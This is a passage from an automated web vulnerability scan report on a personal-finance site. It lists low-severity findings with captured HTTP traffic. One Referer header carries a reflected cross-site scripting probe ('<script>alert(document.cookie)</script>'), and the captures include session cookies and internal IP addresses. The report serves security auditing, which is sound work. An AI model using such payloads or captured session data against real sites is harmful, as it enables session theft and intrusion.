Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:59:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:59:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 8792

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.24. http://www.myfinances.com/saving_machine.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /saving_machine.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /saving_machine.html HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:58:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 9542

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

5.25. http://www.myfinances.com/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /terms.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /terms.html HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:27 GMT
Content-Length: 26439
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
</title>
   
   
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

6. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /compactor.cjs

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /compactor.cjs?page=search/results&list=DSxbDuEMFxaMGEeZnc5QaltfP6B4BnuoqWJR%2BOuJkcTDKhsLiFoj5KzZC2oQHyf74%2FQPuferhED929uKv%2BYHUY9fpi2RjAzOeHQhwjmzBleZ4od1qjk4K9goVAggAcyPJxCGjy4Ko%2FX%2BsEVgh%2F48rTUBWUyXThVmik3NyGOCi7Dc1cTU3X%2FqXKHDbA5JM7G4EocMI08eLNSjlotHx8y6h98oDx2ZEfd8HHcQhjtrhJOwxoFWt3xOQt76uuuhsRobEPYbWZYgP2w9YHu0n%2F6xMu4bCEvtTrt7vJJhhyqwREo%3D HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: application/javascript
Cache-Control: must-revalidate, max-age=584821, post-check=0, pre-check=0
Expires: Thu, 10 Feb 2011 10:25:51 GMT
Date: Thu, 03 Feb 2011 15:58:50 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 21181


//
// Starting Module: search
//

$(document).ready(
   function()
   {
       var $form = $(".search_form");
       var $inputs = $form.find("#keyword,#location");
       $inputs
           .bind('keyup onblur', check_specia
...[SNIP]...
es jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

7. Private IP addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


7.1. http://www.myfinances.com/budget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /budget.php?query=savings+accounts&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: /budget.php?uvx=hl1ZqwCVpQRwFi5ijkVChgfCPJ540bPT7b-kcDisr9eQf0-bw5tbhJzcYUAaAyuwmpvvrWeBk9sMr91oiPUPsr6sO2UtyCYrB3zopgr27R61i57W4TON7-6rRA7M-HQgsfeAGkySNSmENNzXYxwi56Sn-RHtRFHUBhxXNSFyTqJdSpx5JmcFKwjFkplg2WON3LlLaYagtU_pCNafDVpuQ8ZSXWc985E9yDFXRHQjr2Gq6ADDOPKcoYhOloc-uC6DTgVzdIkr2JAqAJSZBw3MLDenXw9JfLYWV9-_mEU2mVxU_SKpgUuyRCpwAQFzkRvQeOXZecYpSBnVMUYpPbV1JUNYC2dl0dYJXSvczNqPZCGdJeyU872uowrrM3Agv7R7Zme5YS-xDez4a9mGQh9K-gDujntk1RPFkH9Pm8ObW4Sc3GFAGgMrsFaYskrJ9Hq6
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:10 GMT
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=n9ulfkf4bvc3gocrocl2036921; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: adc=RSP; path=/;
Content-Length: 0


7.2. http://www.myfinances.com/budget.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /budget.php HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:10 GMT
Content-Length: 21607
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=ddqd7n9uvj64k8219a35nnf334; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-en6jWk7gER-qLy1IQnCcA3MXNSqJbSDkss6lPOg8_nCsvDvyYs6_ELG_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQISZILhVPIHcdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Coh20AJxrkr4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...

8. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.myfinances.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 20 Dec 2010 23:30:49 GMT
ETag: "8b8019-47e-497dfe8f95c40"
Accept-Ranges: bytes
Content-Length: 1150
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=550414
Expires: Thu, 10 Feb 2011 00:52:28 GMT
Date: Thu, 03 Feb 2011 15:58:54 GMT
Connection: close

............ .h.......(....... ..... .........................C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..C3..}]7.|]7.{[6.z[6.z[6.{[6.{[6.z[6.z[6.z[6.yZ6.z[6.{\7.}]7.C3..C3..|\7.z[
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:03:55 CST 2011.